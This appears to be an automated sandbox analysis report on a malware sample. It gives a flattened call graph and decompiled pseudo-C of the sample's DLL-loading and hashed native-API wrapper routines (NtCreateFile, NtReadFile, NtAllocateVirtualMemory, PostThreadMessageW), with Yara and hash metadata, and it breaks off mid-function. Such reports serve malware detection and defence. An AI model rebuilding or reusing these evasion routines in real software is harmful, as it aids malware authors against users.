LdrLoadDll 14885->14886 14886->14885 14888 e59d78 14887->14888 14928 e6df53 14888->14928 14891 e59dcc 14891->14847 14892 e59e4d 14961 e602d3 14892->14961 14893 e6e143 LdrLoadDll 14894 e59df0 14893->14894 14894->14892 14896 e59dfb 14894->14896 14898 e59e79 14896->14898 14931 e5e0a3 14896->14931 14897 e59e68 14899 e59e6f 14897->14899 14902 e59e85 14897->14902 14898->14847 14901 e6e6d3 2 API calls 14899->14901 14901->14898 14969 e6dfd3 14902->14969 14904 e59e15 14904->14898 14951 e59b83 14904->14951 14907 e5e0a3 2 API calls 14909 e59ed0 14907->14909 14909->14898 14972 e6e003 14909->14972 14914 e6e063 LdrLoadDll 14915 e59f1e 14914->14915 14916 e6e6d3 2 API calls 14915->14916 14917 e59f28 14916->14917 14978 e59953 14917->14978 14919 e59f3c 14919->14847 14921 e60418 14920->14921 14922 e59743 6 API calls 14921->14922 14924 e6043c 14922->14924 14923 e5a263 14923->14834 14923->14842 14924->14923 14925 e69203 6 API calls 14924->14925 14927 e70143 2 API calls 14924->14927 15022 e60233 14924->15022 14925->14924 14927->14924 14929 e6f213 LdrLoadDll 14928->14929 14930 e59dc2 14929->14930 14930->14891 14930->14892 14930->14893 14933 e5e0d1 14931->14933 14932 e60183 LdrLoadDll 14934 e5e133 14932->14934 14933->14932 14935 e6e253 LdrLoadDll 14934->14935 14944 e5e17c 14934->14944 14936 e5e15e 14935->14936 14937 e5e168 14936->14937 14940 e5e188 14936->14940 14938 e6e2a3 LdrLoadDll 14937->14938 14939 e5e172 14938->14939 14941 e6e6d3 2 API calls 14939->14941 14942 e5e1f5 14940->14942 14943 e5e212 14940->14943 14941->14944 14945 e6e6d3 2 API calls 14942->14945 14946 e6e2a3 LdrLoadDll 14943->14946 14944->14904 14947 e5e1ff 14945->14947 14948 e5e221 14946->14948 14947->14904 14949 e6e6d3 2 API calls 14948->14949 14950 e5e22b 14949->14950 14950->14904 14953 e59b99 14951->14953 14952 e59d24 14952->14847 14953->14952 14994 e59743 14953->14994 14955 e59c98 14955->14952 14956 e59953 7 API calls 14955->14956 14957 e59cc6 14956->14957 14957->14952 14958 e6e143 LdrLoadDll 14957->14958 14959 e59cfb 14958->14959 14959->14952 14960 e6e743 LdrLoadDll 14959->14960 14960->14952 15001 e6df93 14961->15001 14966 e60344 14966->14897 14967 e6e6d3 2 API calls 14968 e60338 14967->14968 14968->14897 14970 e6f213 LdrLoadDll 14969->14970 14971 e59eb0 14970->14971 14971->14907 14973 e6f213 LdrLoadDll 14972->14973 14974 e59ef5 14973->14974 14975 e6e093 14974->14975 14976 e6f213 LdrLoadDll 14975->14976 14977 e59f0f 14976->14977 14977->14914 14979 e5997c 14978->14979 15007 e598b3 14979->15007 14981 e5998f 14983 e6e743 LdrLoadDll 14981->14983 14984 e59a1a 14981->14984 14985 e59a15 14981->14985 15015 e60353 14981->15015 14983->14981 14984->14919 14986 e6e6d3 2 API calls 14985->14986 14987 e59a4d 14986->14987 14987->14984 14988 e6df53 LdrLoadDll 14987->14988 14989 e59ab2 14988->14989 14989->14984 14990 e6df93 LdrLoadDll 14989->14990 14991 e59b16 14990->14991 14991->14984 14992 e69203 6 API calls 14991->14992 14993 e59b6b 14992->14993 14993->14919 14995 e59842 14994->14995 14996 e59758 14994->14996 14995->14955 14996->14995 14997 e69203 6 API calls 14996->14997 14999 e597c5 14997->14999 14998 e597ec 14998->14955 14999->14998 15000 e70143 2 API calls 14999->15000 15000->14998 15002 e6f213 LdrLoadDll 15001->15002 15003 e60317 15002->15003 15003->14968 15004 e6e033 15003->15004 15005 e6f213 LdrLoadDll 15004->15005 15006 e60328 15005->15006 15006->14966 15006->14967 15008 e598cd 15007->15008 15009 e5cf33 LdrLoadDll 15008->15009 15010 e598e8 15009->15010 15011 e69613 LdrLoadDll 15010->15011 15012 e59900 15011->15012 15013 e5991c 15012->15013 15014 e59909 PostThreadMessageW 15012->15014 15013->14981 15014->15013 15016 e60366 15015->15016 15019 e6e0d3 15016->15019 15020 e6f213 LdrLoadDll 15019->15020 15021 e60391 15020->15021 15021->14981 15023 e60244 15022->15023 15031 e6e923 15023->15031 15026 e6028b 15026->14924 15027 e6e143 LdrLoadDll 15028 e602a2 15027->15028 15028->15026 15029 e6e743 LdrLoadDll 15028->15029 15030 e602c1 15029->15030 15030->14924 15032 e6f213 LdrLoadDll 15031->15032 15033 e60284 15032->15033 15033->15026 15033->15027 16358 e5bdaf 16359 e6f883 LdrLoadDll 16358->16359 16360 e5bdd0 16359->16360 16361 e6f883 LdrLoadDll 16360->16361 16362 e5bde4 16361->16362 16363 e6f883 LdrLoadDll 16362->16363 16364 e5bdfd 16363->16364 16997 e5fea9 16998 e5fecc 16997->16998 16999 e5d283 LdrLoadDll 16998->16999 17000 e5fedf 16999->17000 17001 e6e423 LdrLoadDll 17000->17001 17002 e5feee 17001->17002 17003 e5ff3d 17002->17003 17004 e6ea13 2 API calls 17002->17004 17005 e5ff05 17004->17005 17006 e5ff30 17005->17006 17008 e6e4a3 LdrLoadDll 17005->17008 17007 e6e6d3 2 API calls 17006->17007 17007->17003 17008->17006 15368 e600a8 15369 e600b3 15368->15369 15370 e69613 LdrLoadDll 15369->15370 15371 e600d2 15370->15371 15372 e600db GetUserGeoID 15371->15372 15373 e600d9 15371->15373 17016 e5beb6 17017 e5beca 17016->17017 17018 e5bed0 17017->17018 17019 e5be13 7 API calls 17017->17019 17020 e5bed7 17018->17020 17021 e5bdb3 LdrLoadDll 17018->17021 17019->17018 17022 e5bee0 17021->17022 17023 e5feb3 3 API calls 17022->17023 17024 e5bee8 17023->17024 16421 e60180 16422 e601a0 16421->16422 16423 e6e203 LdrLoadDll 16422->16423 16424 e601e1 16423->16424 16425 e601e8 16424->16425 16426 e6e253 LdrLoadDll 16424->16426 16427 e60211 16426->16427 16434 e5dd8f 16435 e5ddbe 16434->16435 16436 e5d403 LdrLoadDll 16435->16436 16437 e5de15 16436->16437 16438 e5d083 LdrLoadDll 16437->16438 16439 e5de3b 16438->16439 16440 e68b33 LdrLoadDll 16439->16440 16469 e5e08c 16439->16469 16441 e5de80 16440->16441 16442 e5a073 8 API calls 16441->16442 16441->16469 16443 e5dec4 16442->16443 16444 e6e743 LdrLoadDll 16443->16444 16443->16469 16445 e5defb 16444->16445 16446 e60183 LdrLoadDll 16445->16446 16447 e5df1a 16446->16447 16448 e5df21 16447->16448 16449 e6e253 LdrLoadDll 16447->16449 16450 e70143 2 API calls 16448->16450 16451 e5df5e 16449->16451 16452 e5df2e 16450->16452 16453 e5df6b 16451->16453 16456 e5df7b 16451->16456 16454 e70143 2 API calls 16453->16454 16455 e5df72 16454->16455 16457 e60183 LdrLoadDll 16456->16457 16458 e5dfef 16457->16458 16458->16448 16459 e5dffa 16458->16459 16460 e70143 2 API calls 16459->16460 16461 e5e01e 16460->16461 16462 e6e2a3 LdrLoadDll 16461->16462 16463 e5e032 16462->16463 16464 e6e253 LdrLoadDll 16463->16464 16465 e5e059 16464->16465 16466 e6e063 LdrLoadDll 16465->16466 16465->16469 16467 e5e085 16466->16467 16468 e6e8f3 2 API calls 16467->16468 16468->16469 15378 e5e09b 15379 e5e0a4 15378->15379 15380 e60183 LdrLoadDll 15379->15380 15381 e5e133 15380->15381 15382 e5e17c 15381->15382 15383 e6e253 LdrLoadDll 15381->15383 15384 e5e15e 15383->15384 15385 e5e168 15384->15385 15388 e5e188 15384->15388 15386 e6e2a3 LdrLoadDll 15385->15386 15387 e5e172 15386->15387 15389 e6e6d3 2 API calls 15387->15389 15390 e5e1f5 15388->15390 15391 e5e212 15388->15391 15389->15382 15392 e6e6d3 2 API calls 15390->15392 15393 e6e2a3 LdrLoadDll 15391->15393 15394 e5e1ff 15392->15394 15395 e5e221 15393->15395 15396 e6e6d3 2 API calls 15395->15396 15397 e5e22b 15396->15397 17757 e59b75 17758 e59b99 17757->17758 17759 e59743 6 API calls 17758->17759 17763 e59d24 17758->17763 17760 e59c98 17759->17760 17761 e59953 7 API calls 17760->17761 17760->17763 17762 e59cc6 17761->17762 17762->17763 17764 e6e143 LdrLoadDll 17762->17764 17765 e59cfb 17764->17765 17765->17763 17766 e6e743 LdrLoadDll 17765->17766 17766->17763 16575 e5dd7a 16577 e5dd7f 16575->16577 16576 e5dd86 16577->16576 16578 e5d403 LdrLoadDll 16577->16578 16579 e5de15 16578->16579 16580 e5d083 LdrLoadDll 16579->16580 16582 e5de3b 16580->16582 16581 e5e08c 16582->16581 16583 e68b33 LdrLoadDll 16582->16583 16584 e5de80 16583->16584 16584->16581 16585 e5a073 8 API calls 16584->16585 16586 e5dec4 16585->16586 16586->16581 16587 e6e743 LdrLoadDll 16586->16587 16588 e5defb 16587->16588 16589 e60183 LdrLoadDll 16588->16589 16590 e5df1a 16589->16590 16591 e5df21 16590->16591 16592 e6e253 LdrLoadDll 16590->16592 16593 e70143 2 API calls 16591->16593 16594 e5df5e 16592->16594 16595 e5df2e 16593->16595 16596 e5df6b 16594->16596 16599 e5df7b 16594->16599 16597 e70143 2 API calls 16596->16597 16598 e5df72 16597->16598 16600 e60183 LdrLoadDll 16599->16600 16601 e5dfef 16600->16601 16601->16591 16602 e5dffa 16601->16602 16603 e70143 2 API calls 16602->16603 16604 e5e01e 16603->16604 16605 e6e2a3 LdrLoadDll 16604->16605 16606 e5e032 16605->16606 16607 e6e253 LdrLoadDll 16606->16607 16608 e5e059 16607->16608 16608->16581 16609 e6e063 LdrLoadDll 16608->16609 16610 e5e085 16609->16610 16611 e6e8f3 2 API calls 16610->16611 16611->16581 16625 e59d49 16626 e59d78 16625->16626 16627 e6df53 LdrLoadDll 16626->16627 16628 e59dc2 16627->16628 16629 e59dcc 16628->16629 16630 e59e4d 16628->16630 16631 e6e143 LdrLoadDll 16628->16631 16633 e602d3 2 API calls 16630->16633 16632 e59df0 16631->16632 16632->16630 16634 e59dfb 16632->16634 16635 e59e68 16633->16635 16636 e59e79 16634->16636 16639 e5e0a3 2 API calls 16634->16639 16637 e59e85 16635->16637 16638 e59e6f 16635->16638 16642 e6dfd3 LdrLoadDll 16637->16642 16640 e6e6d3 2 API calls 16638->16640 16641 e59e15 16639->16641 16640->16636 16641->16636 16644 e59b83 7 API calls 16641->16644 16643 e59eb0 16642->16643 16645 e5e0a3 2 API calls 16643->16645 16646 e59e43 16644->16646 16647 e59ed0 16645->16647 16647->16636 16648 e6e003 LdrLoadDll 16647->16648 16649 e59ef5 16648->16649 16650 e6e093 LdrLoadDll 16649->16650 16651 e59f0f 16650->16651 16652 e6e063 LdrLoadDll 16651->16652 16653 e59f1e 16652->16653 16654 e6e6d3 2 API calls 16653->16654 16655 e59f28 16654->16655 16656 e59953 7 API calls 16655->16656 16657 e59f3c 16656->16657 17814 e69b5f 17817 e69b6f 17814->17817 17820 e69bc5 17814->17820 17815 e70143 2 API calls 17816 e69bdb 17815->17816 17818 e69203 6 API calls 17817->17818 17821 e69b8a 17818->17821 17819 e69b93 17820->17815 17821->17819 17821->17820 17822 e69c16 17821->17822 17823 e70143 2 API calls 17822->17823 17824 e69c1b 17823->17824 16684 e5bd5f 16685 e5bd63 16684->16685 16690 e5bc93 16684->16690 16686 e5bd84 16685->16686 16687 e6f883 LdrLoadDll 16685->16687 16687->16686 16688 e59703 LdrLoadDll 16689 e5bd19 16688->16689 16690->16688 17162 e51658 17163 e51662 17162->17163 17165 e73393 11 API calls 17163->17165 17164 e517af 17165->17164 16691 e53529 16692 e5358a 16691->16692 16693 e5dd93 9 API calls 16692->16693 16694 e53597 16692->16694 16693->16694 17831 e5cf28 17833 e5cf57 17831->17833 17832 e5cf5e 17833->17832 17834 e5cf93 LdrLoadDll 17833->17834 17835 e5cfaa 17833->17835 17834->17835 15432 e59436 15433 e59453 15432->15433 15434 e5944e 15432->15434 15435 e700c3 2 API calls 15433->15435 15441 e59478 15435->15441 15436 e594db 15437 e6e103 LdrLoadDll 15437->15441 15438 e594e1 15440 e59507 15438->15440 15442 e6e803 LdrLoadDll 15438->15442 15439 e6e803 LdrLoadDll 15439->15441 15441->15436 15441->15437 15441->15438 15441->15439 15444 e700c3 2 API calls 15441->15444 15443 e594f8 15442->15443 15444->15441 17339 e5be10 17340 e6ce93 LdrLoadDll 17339->17340 17341 e5be26 17340->17341 17342 e6cd53 LdrLoadDll 17341->17342 17344 e5be2f 17342->17344 17343 e5be39 17344->17343 17345 e6f593 7 API calls 17344->17345 17346 e5be76 17345->17346 17346->17343 17347 e5bc53 2 API calls 17346->17347 17348 e5be96 17347->17348 17349 e5b6b3 LdrLoadDll 17348->17349 17350 e5bea8 17349->17350

                                                                                                                Executed Functions

                                                                                                                Function 00E5CF33 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 122 e5cf33-e5cf4f 123 e5cf57-e5cf5c 122->123 124 e5cf52 call e70ee3 122->124 125 e5cf62-e5cf70 call e71403 123->125 126 e5cf5e-e5cf61 123->126 124->123 129 e5cf80-e5cf91 call e6f783 125->129 130 e5cf72-e5cf7d call e71683 125->130 135 e5cf93-e5cfa7 LdrLoadDll 129->135 136 e5cfaa-e5cfad 129->136 130->129 135->136
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00E5CF33(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E00E70EE3( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E00E71403(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E00E71683( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E00E6F783(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                                                                                0x00e5cf4f
                                                                                                                0x00e5cf52
                                                                                                                0x00e5cf57
                                                                                                                0x00e5cf5c
                                                                                                                0x00e5cf66
                                                                                                                0x00e5cf6b
                                                                                                                0x00e5cf6e
                                                                                                                0x00e5cf70
                                                                                                                0x00e5cf78
                                                                                                                0x00e5cf7d
                                                                                                                0x00e5cf7d
                                                                                                                0x00e5cf84
                                                                                                                0x00e5cf8c
                                                                                                                0x00e5cf8f
                                                                                                                0x00e5cf91
                                                                                                                0x00e5cfa5
                                                                                                                0x00000000
                                                                                                                0x00e5cfa7
                                                                                                                0x00e5cfad
                                                                                                                0x00e5cf61
                                                                                                                0x00e5cf61
                                                                                                                0x00e5cf61

                                                                                                                APIs
                                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00E5CFA5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.576828889.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.576816406.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_e50000_zeuhAxTIRX.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Load
                                                                                                                • String ID:
                                                                                                                • API String ID: 2234796835-0
                                                                                                                • Opcode ID: 45703d29658771d2e758ce812cc2318878c198cdb6def24393dd66e11465bc29
                                                                                                                • Instruction ID: 06044afd0f64e9fd5297761fdff9ec2413410a9de672b8cf5d6d3822258793dd
                                                                                                                • Opcode Fuzzy Hash: 45703d29658771d2e758ce812cc2318878c198cdb6def24393dd66e11465bc29
                                                                                                                • Instruction Fuzzy Hash: CC015EB1E0020DABDF10DAE4DC56FDDB3B89B54708F1085A5ED08A7240F631EB088BA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00E6E5A3 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 137 e6e5a3-e6e5f4 call e6f213 NtCreateFile
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00E6E5A3(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;

				_t3 = _a4 + 0xa6c; // 0xa6c
				E00E6F213( *((intOrPtr*)(_a4 + 0x14)), _t15, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}




                                                                                                                0x00e6e5b2
                                                                                                                0x00e6e5ba
                                                                                                                0x00e6e5f0
                                                                                                                0x00e6e5f4

                                                                                                                APIs
                                                                                                                • NtCreateFile.NTDLL(00000060,00000000,?,00E6936F,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00E6936F,?,00000000,00000060,00000000,00000000), ref: 00E6E5F0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.576828889.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.576816406.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_e50000_zeuhAxTIRX.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 823142352-0
                                                                                                                • Opcode ID: 0e100477f5381d3d7289312ef97c1911a17bc4e8064b3a3f2b56bd156d4f763d
                                                                                                                • Instruction ID: 0451b68fcca3dae20908b18ceae0c102e27c0818b39341e1f03581229b752ac5
                                                                                                                • Opcode Fuzzy Hash: 0e100477f5381d3d7289312ef97c1911a17bc4e8064b3a3f2b56bd156d4f763d
                                                                                                                • Instruction Fuzzy Hash: EAF0B2B2204208ABCB08CF88DC85EEB37EDAF8C754F018208BA0997241C630E8118BA4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00E6E653 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 140 e6e653-e6e69c call e6f213 NtReadFile
                                                                                                                C-Code - Quality: 37%
                                                                                                                			E00E6E653(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				intOrPtr* _t27;

				_t3 = _a4 + 0xa74; // 0xa76
				_t27 = _t3;
				E00E6F213( *((intOrPtr*)(_a4 + 0x14)), _t13, _t27,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2a);
				_t18 =  *((intOrPtr*)( *_t27))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40); // executed
				return _t18;
			}





                                                                                                                0x00e6e662
                                                                                                                0x00e6e662
                                                                                                                0x00e6e66a
                                                                                                                0x00e6e698
                                                                                                                0x00e6e69c

                                                                                                                APIs
                                                                                                                • NtReadFile.NTDLL(00E69533,00E649FF,FFFFFFFF,00E6901D,00000002,?,00E69533,00000002,00E6901D,FFFFFFFF,00E649FF,00E69533,00000002,00000000), ref: 00E6E698
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.576828889.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.576816406.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_e50000_zeuhAxTIRX.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FileRead
                                                                                                                • String ID:
                                                                                                                • API String ID: 2738559852-0
                                                                                                                • Opcode ID: 844797972357584b4267d2b4ccdf650626f96eee6e100a2b7eb001bcc7868e0e
                                                                                                                • Instruction ID: 0737597aeb93f8f7a9a64e6a7d1f9f4cbd318ca2e5c6b89cc44d46644b190710
                                                                                                                • Opcode Fuzzy Hash: 844797972357584b4267d2b4ccdf650626f96eee6e100a2b7eb001bcc7868e0e
                                                                                                                • Instruction Fuzzy Hash: A4F0A4B6204208ABCB14DF99DC85EEB77ADAF8C754F118258BA0DA7251D630E8118BA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00E6E783 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 143 e6e783-e6e7c0 call e6f213 NtAllocateVirtualMemory
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00E6E783(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;

				_t10 = _a4;
				_t2 = _t10 + 0x14; // 0x6ad04d03
				_t3 = _t10 + 0xa8c; // 0xe54023
				E00E6F213( *_t2, _a4, _t3,  *_t2, 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}




                                                                                                                0x00e6e786
                                                                                                                0x00e6e789
                                                                                                                0x00e6e792
                                                                                                                0x00e6e79a
                                                                                                                0x00e6e7bc
                                                                                                                0x00e6e7c0

                                                                                                                APIs
                                                                                                                • NtAllocateVirtualMemory.NTDLL(00010000,?,00000000,00E53597,00000004,00001000,00000000), ref: 00E6E7BC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.576828889.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.576816406.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_e50000_zeuhAxTIRX.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AllocateMemoryVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 2167126740-0
                                                                                                                • Opcode ID: 007d9bb2bc6f869d9d5f2aff9c303a90246c852ee550cafd5b2adb6fd69cc88f
                                                                                                                • Instruction ID: 1e40515a70f49f649c978f695f4bd8874616aba3c60e2df2000d409f2e4563ad
                                                                                                                • Opcode Fuzzy Hash: 007d9bb2bc6f869d9d5f2aff9c303a90246c852ee550cafd5b2adb6fd69cc88f
                                                                                                                • Instruction Fuzzy Hash: 17F015B6200208ABCB14DF89EC85EAB77ADAF88754F018118FE0897241C630F810CBB4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00E6E6D3 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 160 e6e6d3-e6e6fc call e6f213 NtClose
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00E6E6D3(intOrPtr _a4, void* _a8) {
				long _t8;

				E00E6F213( *((intOrPtr*)(_a4 + 0x14)), _a4, _t5 + 0xa7c,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}




                                                                                                                0x00e6e6ea
                                                                                                                0x00e6e6f8
                                                                                                                0x00e6e6fc

                                                                                                                APIs
                                                                                                                • NtClose.NTDLL(00E60338,00000000,?,00E60338,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00E6E6F8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.576828889.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.576816406.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_e50000_zeuhAxTIRX.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Close
                                                                                                                • String ID:
                                                                                                                • API String ID: 3535843008-0
                                                                                                                • Opcode ID: 675b6986af3fbe89ca5381cf45abfbeb38fb14a73c53f9364842799534e556c6
                                                                                                                • Instruction ID: 5685aabfc8b34ab1395b9f2acfca28a52b06277c06d00343105b255f56fe42a9
                                                                                                                • Opcode Fuzzy Hash: 675b6986af3fbe89ca5381cf45abfbeb38fb14a73c53f9364842799534e556c6
                                                                                                                • Instruction Fuzzy Hash: 38D012766442146BD610EB98EC49F977B9DDF48660F018455BA1C5B242C570F90086E1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00E598AB Relevance: 1.6, APIs: 1, Instructions: 63threadwindowCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                C-Code - Quality: 69%
                                                                                                                			E00E598AB(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t15;
				int _t17;
				long _t30;
				int _t33;
				void* _t36;
				void* _t38;
				void* _t43;

				_t43 = __eflags;
				asm("sbb eax, 0xd5f679b5");
				asm("adc byte [ebp-0x75], 0xec");
				_t36 = _t38;
				_v68 = 0;
				E00E701E3( &_v67, 0, 0x3f);
				E00E70C93( &_v68, 3);
				_t21 = _a4;
				_t15 = E00E5CF33(_t43, _a4 + 0x20,  &_v68); // executed
				_t17 = E00E69613(_a4 + 0x20, _t15, 0, 0, E00E52E33(0xf19d272b));
				_t33 = _t17;
				if(_t33 != 0) {
					_t30 = _a8;
					_t17 = PostThreadMessageW(_t30, 0x111, 0, 0); // executed
					if(_t17 == 0) {
						_t17 =  *_t33(_t30, 0x8003, _t36 + (E00E5C603(1, 8, _t21 + 0x884) & 0x000000ff) - 0x40, _t17);
					}
				}
				return _t17;
			}












                                                                                                                0x00e598ab
                                                                                                                0x00e598ab
                                                                                                                0x00e598b2
                                                                                                                0x00e598b4
                                                                                                                0x00e598c4
                                                                                                                0x00e598c8
                                                                                                                0x00e598d3
                                                                                                                0x00e598d8
                                                                                                                0x00e598e3
                                                                                                                0x00e598fb
                                                                                                                0x00e59900
                                                                                                                0x00e59907
                                                                                                                0x00e59909
                                                                                                                0x00e59916
                                                                                                                0x00e5991a
                                                                                                                0x00e5993e
                                                                                                                0x00e5993e
                                                                                                                0x00e5991a
                                                                                                                0x00e59946

                                                                                                                APIs
                                                                                                                • PostThreadMessageW.USER32(0000FF46,00000111,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00E59916
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.576828889.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.576816406.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_e50000_zeuhAxTIRX.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: MessagePostThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 1836367815-0
                                                                                                                • Opcode ID: 46adc3ea296b95d05bf363cc4900f3fd1ed3d1987fdbe4cd8fb4be761481e984
                                                                                                                • Instruction ID: 6258ccead2a580b40539bb3f238450a5c61489d285c2665cf942e7b585ca5187
                                                                                                                • Opcode Fuzzy Hash: 46adc3ea296b95d05bf363cc4900f3fd1ed3d1987fdbe4cd8fb4be761481e984
                                                                                                                • Instruction Fuzzy Hash: 6211DB71A40318BAE721A6A4DC43FEF77AC9F41B51F145518FF44BA1C2D7D4AA0A83E1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00E598B3 Relevance: 1.6, APIs: 1, Instructions: 62threadwindowCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 106 e598b3-e598c4 107 e598cd-e59907 call e70c93 call e5cf33 call e52e33 call e69613 106->107 108 e598c8 call e701e3 106->108 117 e59940-e59946 107->117 118 e59909-e5991a PostThreadMessageW 107->118 108->107 118->117 119 e5991c-e5993d call e5c603 118->119 119->117
                                                                                                                C-Code - Quality: 84%
                                                                                                                			E00E598B3(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t13;
				int _t15;
				long _t25;
				int _t27;
				void* _t28;
				void* _t32;

				_t32 = __eflags;
				_v68 = 0;
				E00E701E3( &_v67, 0, 0x3f);
				E00E70C93( &_v68, 3);
				_t19 = _a4;
				_t13 = E00E5CF33(_t32, _a4 + 0x20,  &_v68); // executed
				_t15 = E00E69613(_a4 + 0x20, _t13, 0, 0, E00E52E33(0xf19d272b));
				_t27 = _t15;
				if(_t27 != 0) {
					_t25 = _a8;
